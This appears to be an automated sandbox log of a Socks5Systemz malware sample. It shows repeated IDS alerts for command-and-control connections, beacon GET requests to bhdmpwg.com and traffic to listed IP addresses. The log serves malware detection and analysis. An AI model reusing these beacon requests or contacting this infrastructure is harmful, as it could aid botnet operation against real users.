                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49808 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49895 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49944 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49962 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49957 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49962 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49957 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49966 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49951 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49951 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49944 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49966 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49972 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49972 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49986 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49986 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49976 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49982 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49976 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49982 -> 94.232.249.187:80
                  Source: Malware configuration extractorURLs: bhdmpwg.com
                  Source: global trafficTCP traffic: 192.168.2.5:49795 -> 46.8.225.74:2023
                  Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.38
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BC2B95 WSASetLastError,WSARecv,WSASetLastError,select,7_2_02BC2B95
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
